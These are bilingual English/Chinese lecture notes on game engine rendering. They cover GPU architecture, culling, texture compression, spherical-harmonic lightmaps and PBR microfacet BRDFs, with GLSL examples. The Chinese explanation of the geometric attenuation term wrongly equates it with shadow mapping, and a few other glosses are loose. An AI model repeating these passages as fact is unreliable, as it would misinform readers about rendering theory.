      Linearly interpolate between the results

      在结果之间进行线性插值
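
    这三步手写出来大致如下(仅作示意);实际使用三线性采样器时,texture() 在硬件中就是这么做的。函数名为假设。

    // Hand-written trilinear filtering, for illustration only.
    vec4 sampleTrilinear(sampler2D tex, vec2 uv, float lod) {
        float level = floor(lod);                        // Step 1: pick the two nearest mips
        vec4 fine   = textureLod(tex, uv, level);        // Step 2: bilinear in the finer mip
        vec4 coarse = textureLod(tex, uv, level + 1.0);  // Step 2: bilinear in the coarser mip
        return mix(fine, coarse, fract(lod));            // Step 3: lerp between the two results
    }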

    Understanding the Hardware

    ​即使是游戏开发者/技术美术工作人员,了解一下显卡的基本架构也是很有用的。

    GPU

    The dedicated hardware to solve massive jobs

    ​解决大量工作的专用硬件

    SIMD and SIMT

    webp

    SIMD (Single Instruction Multiple Data 单指令多数据)

    • Describes computers with multiple processing elements that perform the same operation on multiple data points simultaneously

      描述具有多个处理元件的计算机,这些元件同时对多个数据点执行相同的操作

    webp

    SIMT (Single Instruction Multiple Threads 单指令多线程)

    • An execution model used in parallel computing where single instruction, multiple data (SIMD) is combined with multithreading

      并行计算中使用的执行模型,其中单指令多数据(SIMD)与多线程相结合

    GPU Architecture

    webp

    GPC (Graphics Processing Cluster 图形处理集群)

    A dedicated hardware block for computing, rasterization, shading and texturing

    ​用于计算、光栅化、着色和纹理的专用硬件块

    SM (Streaming Multiprocessor 流式多处理器)

    Part of the GPU that runs CUDA kernels

    ​运行 CUDA 内核的 GPU 的一部分

    Texture Units 纹理单位

    A texture processing unit, that can fetch and filter a texture

    ​纹理处理单元,可以获取和过滤纹理

    CUDA Core

    Parallel processors that allow data to be worked on simultaneously by different processors

    ​并行处理器允许不同处理器同时处理数据

    Warp

    A collection of threads (32 on NVIDIA GPUs) that execute in lockstep

    ​线程的集合

    Data Flow from CPU to GPU

    webp

    • CPU and Main Memory

      CPU 和主内存

      • Data Load / Unload

        数据加载/卸载

      • Data Preparation

        数据准备

    • CPU to GPU

      • High Latency

        高延迟

      • Limited Bandwidth

        带宽有限

    • GPU and Video Memory

      GPU 和视频内存

      • High Performance Parallel Rendering

        高性能并行渲染

    Always minimize data transfer between CPU and GPU when possible

    ​尽可能减少 CPU 和 GPU 之间的数据传输

    Be Aware of Cache Efficiency

    webp

    ​Cache 比内存更快,尽量少做内存交换。

    webp

    • Take full advantage of hardware parallel computing

      充分利用硬件并行计算

    • Try to avoid the von Neumann bottleneck

      尽量避免冯诺依曼瓶颈

    GPU Bounds and Performance

    ​GPU 限制和性能

    Application performance is limited by:

    ​应用程序性能受到以下因素的限制:

    • Memory Bounds

      内存限制

    • ALU Bounds

      ALU 限制

    • TMU (Texture Mapping Unit) Bound

      TMU(纹理映射单元)限制

    • BW (Bandwidth) Bound

      BW(带宽)限制

    Modern Hardware Pipeline

    webp

    • Direct3D 12 graphics pipeline

      Direct3D 12 图形管道

    • Mesh and amplification shaders

      网格和放大着色器

    • Direct3D 12 compute pipeline

      Direct3D 12 计算管道

    Other State-of-Art Architectures

    ​其他最先进的架构

    webp

    GPU:

    1.825 GHz, 52 CUs, 12 TFLOPS FP32, 3328 streaming processors

    DRAM:

    16 GB GDDR6, 10 GB high memory interleave + 6 GB low memory interleave

    20 channels of x16 GDDR6 @ 14 Gbps -> 560 GB/s

    CPU:

    8x Zen 2 CPU cores @ 3.8 GHz (3.6 GHz w/ SMT), 32 KB L1 I$, 32 KB L1 D$, 512 KB L2 per CPU core

    webp

    Renderable

    Mesh Render Component

    • Everything is a game object in the game world

      游戏世界中的一切都是游戏对象

    • Game object could be described in the component-based way

      游戏对象可以用基于组件的方式描述

    Building Blocks of Renderable

    ​可渲染的构建块

    webp

    Mesh Primitive

    ​网格基元

    webp

    Vertex and Index Buffer

    ​顶点和索引缓冲区

    webp

    • Vertex Data

      顶点数据

      • Vertex declaration

        顶点声明

      • Vertex buffer

        顶点缓冲区

    • Index Data

      索引数据

      • Index declaration

        索引声明

      • Index buffer

        索引缓冲区

    Why We Need Per-Vertex Normal

    webp

    ​为什么我们需要顶点法线?如果根据面法线计算的话,对于转角处,顶点法线方向可能会有歧义。

    Materials

    webp

    Determine the appearance of objects, and how objects interact with light

    ​确定物体的外观以及物体如何与光相互作用

    Famous Material Models

    webp

    Phong Model

    PBR Model - Physically based rendering 基于物理的渲染

    Subsurface Material - Burley SubSurface Profile 渲染皮肤

    Various Textures in Materials

    webp

    Variety of Shaders

    webp

    Render Objects in Engine

    Coordinate System and Transformation

    ​坐标系和变换

    webp

    Model assets are made based on local coordinate systems, and eventually we need to render them into screen space

    ​模型资源是基于局部坐标系制作的,最终我们需要将它们渲染到屏幕空间中

    Object with Many Materials

    webp

    ​如果一个对象仅使用一个材质,渲染出的效果可能不够真实。

    How to Display Different Textures on a Single Model

    webp

    ​将 Object 模型分为多个 Submesh,每个 Submesh 使用不同的 Material。

    webp

    ​如果每个 Submesh 都占据显存的空间,会导致浪费。

    Resource Pool

    webp

    ​使用一个资源池,加强资源的复用。

    Instance: Use Handle to Reuse Resources

    ​实例:使用句柄重用资源

    webp

    Sort by Material

    webp

    GPU Batch Rendering

    webp

    ​GPU Batch Rendering 是一种图形渲染技术,它利用计算机的 GPU(Graphics Processing Unit)来加速图形渲染过程。在传统的图形渲染中,每个物体都需要单独渲染,这会导致大量的数据传输和渲染时的负载,降低了渲染效率。

    ​而 GPU Batch Rendering 则可以将多个物体合并成一个批次(Batch),同时进行渲染。这种方式可以减少数据传输,提高渲染效率,特别是在大规模场景和复杂模型的情况下,可以极大地提高渲染速度。

    Q: What if we group-render all instances with identical submeshes and materials together?

    ​问:如果将具有相同子网格和材质的所有实例分组渲染在一起会怎样?

    Visibility Culling

    ​可见性剔除

    Culling One Object

    webp

    View Frustum

    ​视锥体

    Soldier Bounding Box

    ​士兵边界框

    Using the Simplest Bound to Create Culling

    ​使用最简单的包围体进行剔除

    webp

    • Inexpensive intersection tests

      廉价的交叉测试

    • Tight fitting

      紧密包裹物体

    • Inexpensive to compute

      计算成本低廉

    • Easy to rotate and transform

      易于旋转和变换

    • Use little memory

      使用很少的内存

    Hierarchical View Frustum Culling

    webp

    ​使用 Quad Tree Culling 和 BVH 等,排除不可见对象

    Construction and insertion of BVH in Game Engine

    ​游戏引擎中 BVH 的构建和插入

    webp

    PVS (Potential Visibility Set)

    ​PVS(潜在可见性集)

    webp

    ​PVS(Potentially Visible Set)是一种基于空间划分的可视性剔除算法,用于在三维场景中快速确定观察点能够看到哪些物体。

    ​PVS 算法的基本思想是将场景分割成多个相邻的小区域(如八叉树等),然后对每个小区域计算其与其他小区域的可见性关系,即确定一个小区域可以直接看到哪些相邻的小区域,这些可见的小区域组成了该小区域的 PVS 集合。

    ​当观察点移动时,只需要判断当前观察点所处的小区域的 PVS 集合中是否包含其他小区域,从而确定哪些物体需要被渲染。这种方法可以大大减少需要渲染的物体数量,提高渲染效率。

    ​PVS 算法还可以通过优化 PVS 集合的计算和存储方式,以及合并相邻小区域的 PVS 集合等手段进一步提高效率。但是,由于 PVS 算法依赖于场景的空间划分,因此对于具有复杂几何形状或存在大量遮挡物的场景,该算法可能会带来较大的计算负担。

    Portal and PVS Data

    webp

    Determine potentially visible leaf nodes immediately from portal

    ​立即从门户确定潜在可见的叶节点

    The Idea of Using PVS in Stand-alone Games

    ​单机游戏中 PVS 的使用思路

    webp

    Green box:

    The areas where you need to determine potential visibility

    ​确定您需要的潜在可见度的区域

    Blue cells:

    Auto generated smaller regions of each green box.

    ​自动生成每个绿色框的较小区域。

    Pros 优点

    • Much faster than BSP/Octree

      比 BSP/八叉树快得多

    • More flexible and compatible

      更灵活、更兼容

    • Preload resources by PVS

      通过 PVS 预加载资源

    GPU Culling

    webp

    ​先不渲染材质,根据深度信息排除掉不可见部分后再渲染。

    Texture Compression

    ​纹理压缩

    A must-know for game engine

    ​游戏引擎必须了解的知识

    Texture Compression

    webp

    • Traditional image compression like JPG and PNG

      传统图像压缩,如 JPG 和 PNG

      • Good compression rates

        良好的压缩率

      • Image quality

        图像质量

      • Designed to compress or decompress an entire image

        设计用于压缩或解压缩整个图像

    • In game texture compression

      游戏中的纹理压缩

      • Decoding speed

        解码速度

      • Random access

        随机访问(传统图像压缩无法做到随机访问,即快速获取某个坐标的颜色值)

      • Compression rate and visual quality

        压缩率和视觉质量

      • Encoding speed

        编码速度

    Block Compression

    webp

    Common block-based compression format

    ​常见的基于块的压缩格式

    • On PC, BC7 (modern) or DXTC (old) formats

      在 PC 上,BC7(现代)或 DXTC(旧)格式

    • On mobile, ASTC (modern) or ETC / PVRTC (old) formats

      在移动设备上,ASTC(现代)或 ETC / PVRTC(旧)格式

    Authoring Tools of Modeling

    ​建模创作工具

    Modeling - Polymodeling

    webp

    ​使用基于多边形建模的软件。

    Modeling - Sculpting

    webp

    ​ZBrush 提供了一种新的建模概念——雕刻。

    Modeling -Scanning

    webp

    ​使用扫描仪建模。

    Modeling - Procedural Modeling

    webp

    ​程序化建模:

    Comparison of Authoring Methods

    ​创作方法比较

    |              | Polymodeling   | Sculpting            | Scanning             | Procedural modeling |
    | Advantage    | Flexible       | Creative             | Realistic            | Intelligent         |
    | Disadvantage | Heavy workload | Large volume of data | Large volume of data | Hard to achieve     |

    Cluster-Based Mesh Pipeline

    ​基于集群的网格管道

    Sculpting Tools Create Infinite Details

    webp

    ​雕刻工具创造无限细节

    • Artists create models with infinite details

      艺术家创造具有无限细节的模型

    • From linear FPS to open-world FPS games, complex scenes submit 10+ times more triangles to the GPU per frame

      从线性 fps 到开放世界 fps,复杂场景每帧向 GPU 提交 10 倍以上的三角形

    Cluster-Based Mesh Pipeline

    ​基于集群的网格管道

    webp

    GPU-Driven Rendering Pipeline (2015) GPU 驱动的渲染管道 (2015)

    • Mesh Cluster Rendering

      网格簇渲染

      • Arbitrary number of meshes in a single drawcall

        单次绘制中任意数量的网格

      • GPU-culled by cluster bounds

        按集群边界进行 GPU 剔除,一个对象中的不可见部分就不渲染了

      • Cluster depth sorting

        聚类深度排序

    Geometry Rendering Pipeline Architecture (2021) 几何渲染管线架构(2021)

    • Rendering primitives are divided as:

      渲染基元分为:

      • Batch: a single API draw (drawIndirect / drawIndexIndirect), composed of many Surfs

        Batch:单个 API 绘制(drawIndirect / drawIndexIndirect),由许多 Surf 组成

      • Surf: submeshes based on materials, composed of many Clusters

        Surf:基于材质的子网格,由许多簇组成

      • Cluster: a strip of 64 triangles

        簇:64 个三角形条

    Programmable Mesh Pipeline

    webp

    GPU Culling in Cluster-Based Mesh

    ​基于集群的网格中的 GPU 剔除

    webp

    ​背面的 cluster 就看不见了。

    Nanite

    • Hierarchical LOD clusters with seamless boundary

      具有无缝边界的分层 LOD 集群

    • Don’t need hardware support, but using a hierarchical cluster culling on the precomputed BVH tree by persistent threads (CS) on GPU instead of task shader

      不需要硬件支持,但通过 GPU 上的持久线程(CS)而不是任务着色器对预先计算的 BVH 树使用分层集群剔除

    Take Away

    1. The design of game engine is deeply related to the hardware architecture design

      游戏引擎的设计与硬件架构设计有很深的关系

    2. A submesh design is used to support a model with multiple materials

      采用子网格设计来支持多种材质的模型

    3. Use culling algorithms to draw as few objects as possible

      使用剔除算法绘制尽可能少的对象

    4. As GPUs become more powerful, more and more work is moved onto the GPU, which is called GPU Driven rendering

      随着 GPU 越来越强大,越来越多的工作转移到 GPU 上,这就是 GPU 驱动

    第五节:渲染中光和材质的数学魔法

    Rendering on Game Engine

    Lighting, Materials and Shaders

    Participants of Rendering Computation

    ​渲染计算参与者

    • Lighting

      灯光

      • Photon emit, bounce, absorb and perception is the origin of everything in rendering

        光子的发射、反弹、吸收和感知是渲染中一切的起源

    • Material

      材料

      • How matter react to photon

        物质如何对光子做出反应

    • Shader

      着色器

      • How to train and organize those micro-slaves to finish such a vast and dirty computation job between photon and materials

        如何训练和组织这些微型奴隶来完成光子和材料之间如此庞大而肮脏的计算工作

    An interesting adventure story, written by smart graphics scientists and engineers as hardware evolved.

    ​聪明的图形科学家和工程师们随着硬件的演进写就的一段有趣的冒险故事。

    The Rendering Equation

    ​James Kajiya 在 1986 年的 SIGGRAPH 提出了渲染方程:

    $$L_o(x,\omega_o)=L_e(x,\omega_o)+\int_{H^2}f_r(x,\omega_o,\omega_i)L_i(x,\omega_i)\cos\theta_id\omega_i$$

    出射 outgoing = 自发光 emitted + 反射光 reflected

    ​Radiance(辐射度)指的是在给定方向上单位面积上的能量辐射量。它表示了光线从光源或物体表面出射的能量。Radiance 与发射光线的方向、面积以及能量有关,通常用符号 L 表示,单位为 $W/(sr*m^2)$(瓦特/球面弧度平方米)。

    ​Irradiance(入射照度)指的是单位面积上受到的来自各个方向的光能量的总和。它表示了光线对物体表面的照射强度。Irradiance 与入射光线的方向、面积以及能量有关,通常用符号 E 表示,单位为 $W/m^2$(瓦特/平方米)。

    webp

    ​虽然这个方程很早就被提出,但是想要正确又高效地计算这个方程太困难了。

    webp

    Complexity of Real Rendering

    webp

    ​现实生活中的光太复杂了。

    • Indirect light

      间接光

    • Indirect shadow

      间接阴影

    • Direct light

      直射光

    • Scattering

      散射

    • Caustics

      焦散

    • Glossy reflections

      光泽反射

    The 1st Challenge: 1a Visibility to Lights

    webp

    ​第一困难:计算光照是否可见

    The 1st Challenge: 1b Light Source Complexity

    webp

    ​第一困难:光照种类复杂

    The 2nd Challenge: How to do Integral Efficiently on Hardware

    ​第二个挑战:如何在硬件上高效地进行积分

    webp

    • Brute-force way sampling

      暴力方式采样

    • Smarter sampling, i.e., Monte Carlo

      更智能的采样,即蒙特卡罗方法

    • Derive fast analytical solutions

      得出快速分析解决方案

      • Simplify the $f_r$ :

        简化 $f_r$:

        • Make assumptions about the optical properties of materials

          假设材料的光学特性

        • Mathematical representation of materials

          材料的数学表示

      • Simplify the $L_i$ :

        简化$L_i$:

        • Deal with directional light, point light and spot light only

          仅处理定向光、点光和聚光灯

        • A mathematical representation of incident light sampling on a hemisphere, for ex: IBL and SH

          半球上入射光采样的数学表示,例如:IBL 和 SH

    The 3rd Challenge: Any Matter Can Be a Light Source

    ​挑战之三:任何物质都可以成为光源(会反射光)

    webp

    Starting from Simple

    Forget some abstract concepts for a while, e.g. radiosity, microfacets, BRDF, etc.

    ​暂时忘记一些抽象概念,例如光能传递、微表面、BRDF 等

    Simple Light Solution

    webp

    glLightfv(GL_LIGHT0, GL_AMBIENT, light_ambient);
    glLightfv(GL_LIGHT0, GL_DIFFUSE, light_diffuse);
    glLightfv(GL_LIGHT0, GL_SPECULAR, light_specular);
    glLightfv(GL_LIGHT0, GL_POSITION, light_position);
    • Using simple light source as main light

      使用简单光源作为主光

      • Directional light in most cases

        大多数情况下是定向光

      • Point and spot light in special case

        特殊情况下的点光源和聚光灯

    • Using ambient light to hack the rest

      用一个环境光常量近似(hack)其余所有光照

      • A constant to represent mean of complex hemisphere irradiance

        表示复半球辐照度平均值的常数

    • Supported in graphics API

      图形 API 支持

    Environment Map Reflection

    webp

    • Using environment map to enhance glossy surface reflection

      使用环境贴图增强光泽表面的反射

    • Using environment mipmap to represent roughness of surface

      使用环境 mipmap 来表示表面的粗糙度

    void main()
    {
        vec3 N = normalize(normal);
        vec3 V = normalize(camera_position - world_position);
        vec3 R = reflect(-V, N);
        FragColor = texture(cube_texture, R);
    }

    Early stage exploration of image-based lighting

    ​基于图像的照明的早期探索

    Math Behind Light Combo

    ​光组合背后的数学

    webp

    • Main Light

      主光源

      • Dominant Light

        主光源

    • Ambient Light

      环境光

      • Low-frequency of irradiance sphere distribution

        低频辐照度球体分布

    • Environment Map

      环境贴图

      • High-frequency of irradiance sphere distribution

        高频辐照度球体分布

    Blinn-Phong Materials

    webp

    ​冯光照模型是个很经典的光照模型,虽然现在有点过时了。
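
    作为参考,下面是一个最小化的 Blinn-Phong 着色函数草图(GLSL);假设 N、V、L 均已归一化,材质参数均为示意。

    // Minimal Blinn-Phong: diffuse + half-vector specular.
    vec3 blinnPhong(vec3 N, vec3 V, vec3 L, vec3 lightColor,
                    vec3 kd, vec3 ks, float shininess) {
        vec3 H = normalize(V + L);                        // half vector between view and light
        vec3 diffuse  = kd * max(dot(N, L), 0.0);
        vec3 specular = ks * pow(max(dot(N, H), 0.0), shininess);
        return (diffuse + specular) * lightColor;
    }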

    Problem of Blinn-Phong

    • Not energy conservative

      不符合能量守恒定律(可能越反射越亮)

      • Unstable in ray-tracing

        光线追踪不稳定

    webp

    Left: the non-energy-conserving model produces a lot of noise, compared with the energy-conserving model on the right

    ​左:不满足能量守恒的模型会产生大量噪点;右:满足能量守恒的模型

    • Hard to model complex realistic material

      难以模拟复杂材质(冯模型模拟出来都有一股塑料感)

    webp

    Shadow

    webp

    • Shadow is nothing but space when the light is blocked by an opaque object

      当光线被不透明物体阻挡时,阴影只不过是空间

    • Already obsolete method

      已经过时的方法

      • planar shadow

        平面阴影

      • shadow volume

        阴影体积

      • projective texture

        投影纹理

    Shadow Map

    ​Shadow Map 是计算机图形学中用于实现阴影的一种技术。它将场景从光源的视角渲染到一张深度纹理上,在后续渲染中用这张纹理判断哪些表面处于阴影之中。

    ​即预先计算出阴影贴图,用一张 texture 表示阴影。

    webp

    // project our 3D position to the shadow map
    vec4 proj_pos = shadow_viewproj * pos;
    // from homogeneous space to clip space
    vec2 shadow_uv = proj_pos.xy / proj_pos.w;
    // from clip space to uv space
    shadow_uv = shadow_uv * 0.5 + vec2(0.5);
    // get point depth (from -1 to 1)
    float real_depth = proj_pos.z / proj_pos.w;
    // normalize from [-1..+1] to [0..+1]
    real_depth = real_depth * 0.5 + 0.5;
    // read depth from depth buffer in [0..+1]
    float shadow_depth = texture(shadowmap, shadow_uv).x;
    // compute final shadow factor by comparing
    float shadow_factor = 1.0;
    if (shadow_depth < real_depth)
        shadow_factor = 0.0;

    Problem of Shadow Map

    webp

    Resolution is limited on texture

    ​分辨率受纹理限制

    webp

    Depth precision is limited in texture

    ​深度精度受到纹理的限制

    Basic Shading Solution

    • Simple light + Ambient

      简单光 + 环境光

      • dominant light solves challenge 1b

        主光解决了第 1b 项挑战

      • ambient and EnvMap solve challenge 3

        环境光和 EnvMap 解决了第 3 项挑战

    • Blinn-Phong material

      • solves challenge 2

        解决第 2 项挑战

    • Shadow map

      阴影贴图

      • solves challenge 1a

        解决第 1a 项挑战

    Cheap, Robust and Easy Modification

    ​便宜、鲁棒且易于修改

    First Wave of AAA Quality

    ​3A 游戏的渲染技术不断发展。

    Pre-computed Global Illumination

    ​预先离线计算好全局光照,运行时直接使用,减少实时计算量。

    Why Global Illumination is Important

    webp

    ​如果不考虑光的反射,大片面积将会一坨黑。

    How to Represent indirect Light

    webp

    • Good compression rate

      良好的压缩率

      • We need to store millions of radiance probes in a level

        我们需要在一个关卡中存储数百万个辐射度探针

    • Easy to do integration with material function

      易于与材料功能集成

      • Use polynomial calculation to convolve with the material BRDF

        使用多项式计算与材质 BRDF 进行卷积

    ​计算光照用到了下面数学工具:

    Fourier Transform

    webp

    $$f(t)=\frac{A}{2}+\frac{2A\cos(t\omega)}{\pi}-\frac{2A\cos(3t\omega)}{3\pi}+\frac{2A\cos(5t\omega)}{5\pi}-\frac{2A\cos(7t\omega)}{7\pi}+\cdots $$

    ​傅里叶变换让函数在时域和空域之间转换。

    Convolution Theorem

    webp

    ​引入傅里叶变换,让卷积速度更快!

    Spherical Harmonics

    ​球谐函数

    ​Spherical Harmonics(球谐函数)是一组用于描述球面上函数的数学函数系列。在计算机图形学中,球谐函数被广泛应用于光照和环境光的表示与计算。

    webp

    webp

    Spherical Harmonics, a mathematical system analogous to the Fourier transform but defined across the surface of a sphere. The SH functions in general are defined over complex numbers

    ​球谐函数,一种类似于傅立叶变换、但定义在球面上的数学系统。SH 函数一般定义在复数域上

    Spherical Harmonics Encoding

    webp

    Sampling Irradiance Probe Anywhere

    webp

    Compress Irradiance Probe to SH1

    ​Irradiance Probe(辐照度探针)是计算机图形学中用于捕捉和近似表示环境光照信息的技术。它通过在场景中放置一系列探针来采样场景中的辐照度(irradiance),并将采样结果存储起来,供渲染时使用。

    webp

    • Source Irradiance Probe

      原始辐照度探针

    • Compressed Irradiance Probe by SH1

      用 SH1 压缩后的辐照度探针

    • Reconstruct Irradiance in Shader

      在着色器中重建辐照度

    Store and Shading with SH

    Just RGBA8 color

    • Use 4 RGB textures to store 12 SH coefficients

      使用 4 个 RGB 纹理来存储 12 个 SH 系数

      • $L0$ coefficients in HDR (BC6H texture)

        HDR 中的 $L0$ 系数(BC6H 纹理)

      • $L1$ coefficients in LDR (3x BC7 or BC1 textures)

        LDR 中的 $L1$ 系数(3x BC7 或 BC1 纹理)

    • Total footprint for RGB SH lightmaps:

      RGB SH 光照贴图的总占用空间:

      • 32 bits (4 bytes)/texel for BC6H+BC7, high quality mode

        BC6H+BC7:每纹素 32 位(4 字节),高质量模式

      • 20 bits (2.5 bytes)/texel for BC6H+BC1, low quality mode

        BC6H+BC1:每纹素 20 位(2.5 字节),低质量模式

    Simple diffuse shading

    webp
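
    按上面的四纹理布局,在着色器中重建辐照度并做漫反射着色大致如下(仅作草图)。纹理名、LDR 的 [0,1] 到 [-1,1] 解包方式均为假设;这里还假设球谐基函数与余弦瓣的常数已折叠进烘焙系数中(实际引擎常把 L1 存成相对 L0 的比值,这里为简化直接使用解包值)。

    // Reconstruct irradiance from baked L0/L1 SH coefficients.
    uniform sampler2D shL0;                  // RGB: band-0 (L0) coefficients, HDR (BC6H)
    uniform sampler2D shL1x, shL1y, shL1z;   // RGB: band-1 (L1) coefficients per axis, LDR

    vec3 evalSH1Irradiance(vec2 lightmapUV, vec3 N) {
        vec3 c0 = texture(shL0,  lightmapUV).rgb;
        vec3 c1 = texture(shL1x, lightmapUV).rgb * 2.0 - 1.0;  // unpack LDR [0,1] -> [-1,1]
        vec3 c2 = texture(shL1y, lightmapUV).rgb * 2.0 - 1.0;
        vec3 c3 = texture(shL1z, lightmapUV).rgb * 2.0 - 1.0;
        // Band-0 term plus the three band-1 terms evaluated along the normal.
        return max(c0 + c1 * N.x + c2 * N.y + c3 * N.z, 0.0);
    }

    // Simple diffuse shading: albedo * reconstructed irradiance.
    // vec3 color = albedo * evalSH1Irradiance(uv, normalize(N));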

    SH Lightmap: Precomputed GI

    ​SH 光照贴图:预计算 GI

    ​空间换时间。

    ​SH Lightmap 是一种基于球谐函数(Spherical Harmonics)的光照贴图技术,可以用于近似表示场景中的光照信息。它通过将场景的光照信息转换为球谐系数并存储到贴图上,以便在渲染时快速计算每个片元的光照贡献。

    webp

    • Parameterize the whole scene into a huge 2D lightmap atlas

      将所有场景参数化为巨大的 2D 光照图集

    • Using offline lighting farm to calculate irradiance probes for all surface points

      使用离线光照烘焙农场(lighting farm)计算所有表面点的辐照度探针

    • Compress those irradiance probes into SH coefficients

      将这些辐照度探头压缩为 SH 系数

    • Store SH coefficients into 2D atlas lightmap textures

      将 SH 系数存储到 2D 图集光照贴图纹理中

    Lightmap: UV Atlas

    webp

    Lightmap density

    ​光照贴图密度

    • Low-poly proxy geometry

      低多边形代理几何体

    • Fewer UV charts/islands

      更少的 UV 图块 / 岛

    • Fewer lightmap texels are wasted

      浪费的光照贴图纹理像素更少

    Lightmap: Lighting

    webp

    Indirect lighting, final geometry

    ​间接照明,最终几何

    • Project lightmap from proxies to all LODs

      将光照贴图从代理投影到所有 LOD

    • Apply mesh details

      应用网格细节

    • Add short-range, high-frequency lighting detail by HBAO

      通过 HBAO 添加短距离、高频照明细节

    Lightmap: Lighting + Direct Lighting

    webp

    ​光照贴图:光照+直接光照

    Direct + indirect lighting, final geometry

    ​直接+间接照明,最终几何形状

    • Compute direct lighting dynamically

      动态计算直接照明

    Final Shading with Materials

    webp

    Final frame

    ​最终帧

    • Combined with materials

      与材质结合

    Lightmap

    • Pros

      优点

      • Very efficient on runtime

        运行时非常高效

      • Bake a lot of fine details of GI into the environment

        把 GI 的很多细节烘焙到环境上

    • Cons

      缺点

      • Long and expensive precomputation (lightmap farm)

        漫长而昂贵的预计算(光照贴图农场)

      • Only can handle static scene and static light

        只能处理静态场景和静态灯光

      • Storage cost on package and GPU

        包和 GPU 的存储成本

    Light Probe: Probes in Game Space

    webp

    Light Probe Point Generation

    webp

    Reflection Probe

    webp

    Light Probes + Reflection Probes

    • Pros

      优点

      • Very efficient on runtime

        运行时非常高效

      • Can be applied to both static and dynamic objects

        可应用于静态和动态对象

      • Handle both diffuse and specular shading

        处理漫反射和镜面反射着色

    • Cons

      缺点

      • A bunch of SH light probes need some precomputation

        一堆 SH 光探头需要一些预计算

      • Cannot handle fine details of GI, e.g. soft shadows on overlapped structures

        无法处理 GI 的精细细节,例如重叠结构上的软阴影

    Physical-Based Material

    Microfacet Theory

    ​微平面理论。

    webp

    BRDF Model Based on Microfacet

    ​基于 Microfacet 的 BRDF 模型

    webp

    Normal Distribution Function

    webp

    $$f_{CookTorrance}=\frac{DFG}{4(\omega_{o}\cdot n)(\omega_{i}\cdot n)}$$

    $$NDF_{GGX}(n,h,\alpha)=\frac{\alpha^{2}}{\pi\left((n\cdot h)^{2}(\alpha^{2}-1)+1\right)^{2}}$$

    Geometric Attenuation Term (self-shadowing)

    ​在计算机图形学中,几何衰减项(self-shadowing)是指在渲染过程中考虑物体自身阴影对光照效果的影响。当光线射向一个物体表面时,如果该表面的某些部分被遮挡,这些被遮挡的部分就会处于阴影之中,从而无法直接受到光的照射,导致其表面变暗。

    ​几何衰减项通常用于模拟光线在渲染过程中如何与物体表面相互作用,从而影响最终的光照结果。这种效应特别明显的情况是当光源和观察者之间有障碍物时,如一个物体投射的阴影落在自身表面上。

    ​几何衰减项可以通过各种方式来实现,其中一种常见的方式是使用阴影映射(shadow mapping)技术。在阴影映射中,首先从光源的视角渲染场景,并将渲染结果保存在一个深度贴图(depth map)中。然后,对于每个像素,通过比较深度贴图中的深度值来确定该像素是否在阴影之中。如果某个像素被深度贴图中的深度值所遮挡,那么该像素就被认为处于阴影之中,从而进行相应的颜色调整,实现几何衰减效果。

    webp

    $$\begin{gathered}
    f_{CookTorrance}=\frac{DFG}{4(\omega_o\cdot n)(\omega_i\cdot n)} \\
    G_{Smith}(l,\nu)=G_{GGX}(l)\cdot G_{GGX}(\nu) \\
    G_{GGX}(\nu)=\frac{n\cdot\nu}{(n\cdot\nu)(1-k)+k}\quad k=\frac{(\alpha+1)^{2}}{8}
    \end{gathered}$$

    // Geometry Term: geometry masking/shadowing due to microfacets
    float G_GGX(float NdotV, float k) {
        return NdotV / (NdotV * (1.0 - k) + k);
    }
    float G_Smith(float NdotV, float NdotL, float roughness) {
        float k = pow(roughness + 1.0, 2.0) / 8.0;
        return G_GGX(NdotL, k) * G_GGX(NdotV, k);
    }

    Fresnel Equation

    ​当视角接近反射平面时,反射率会急剧上升。

    webp

    $$\begin{aligned}&f_{CookTorrance}=\frac{DFG}{4(\omega_{o}\cdot n)(\omega_{i}\cdot n)}\\&F_{Schlick}(h,\nu,F_{0})=F_{0}+(1-F_{0})\left(1-(\nu\cdot h)\right)^{5}\end{aligned}$$

    ​这个 5 次方是数学家推导出来的。

    // Fresnel term with scalar optimization
    float F_Schlick(float VoH, float f0) {
        float f = pow(1.0 - VoH, 5.0);
        return f0 + (1.0 - f0) * f;
    }

    Physical Measured Material

    webp

    MERL BRDF Database of measured materials

    ​这个数据集测量了各种材质的数据。

    Disney Principled BRDF

    Principles to follow when implementing model:

    ​实施模型时应遵循的原则:

    • Intuitive rather than physical parameters should be used

      应使用直观参数而不是物理参数

    • There should be as few parameters as possible

      参数应该尽可能少

    • Parameters should be zero to one over their plausible range

      参数在其合理范围内应为 0 到 1

    • Parameters should be allowed to be pushed beyond their plausible range where it makes sense

      应允许参数超出其合理范围

    • All combinations of parameters should be as robust and plausible as possible

      所有参数组合应尽可能稳健且合理

    Disney Principle Material Parameters

    ​Disney Principled BRDF 是迪士尼(Disney)开发的一种基于物理的渲染表面模型,用于在计算机图形学中模拟材质的外观。BRDF 是 Bidirectional Reflectance Distribution Function 的缩写,用于描述光线从表面反射的方式。Disney Principled BRDF 将多个常见的渲染表面模型(如 Lambert、Blinn-Phong、Cook-Torrance 等)融合成一个单一的、参数化的模型,使得艺术家和技术人员可以更简单地控制材质的外观,并且更好地满足物理真实性的要求。

    ​Disney Principled BRDF 的主要特点和参数包括:

    1. 基础颜色(Base Color): 表示表面的颜色,即在没有其他光照影响的情况下表面的颜色。

    2. 金属度(Metallic): 表示表面是否具有金属质感。金属度为 0 表示非金属材质,金属度为 1 表示完全是金属材质。

    3. 粗糙度(Roughness): 表示表面的光滑程度。粗糙度为 0 表示表面非常光滑,反射光线呈现清晰的镜面反射,而粗糙度为 1 表示表面非常粗糙,反射光线呈现模糊的散射。

    4. 法线(Normal): 表示表面的法线方向,用于模拟表面的微观凹凸结构。

    5. 环境遮挡(Ambient Occlusion): 用于模拟光线在表面附近的阴影效果,增强表面的立体感。

      Disney Principled BRDF 的优点在于它简化了材质创建的流程,减少了需要调整的参数数量,同时也更符合物理真实性。通过调整基础颜色、金属度和粗糙度等参数,可以实现多种不同类型材质的外观,包括金属材质、塑料、玻璃等。

      这种模型的广泛应用使得它成为了许多计算机图形学软件和引擎中的标准渲染模型之一,例如 Pixar 的 RenderMan、Blender 内置的 Cycles 渲染引擎等。

    webp

    PBR Specular Glossiness

    ​Specular Glossiness(高光光泽度)是一种用于描述材质表面反射特性的属性。它通常被用于渲染引擎和材质编辑器中,用于控制物体表面的光泽程度以及高光的大小和清晰度。

    webp

    webp

    PBR Metallic Roughness

    ​Metallic Roughness 是一种用于描述材质外观的参数化模型,通常用于计算机图形学中的渲染。它是 Disney Principled BRDF 中的两个主要参数之一,用于控制材质的金属度和粗糙度,从而影响表面的反射和散射行为。

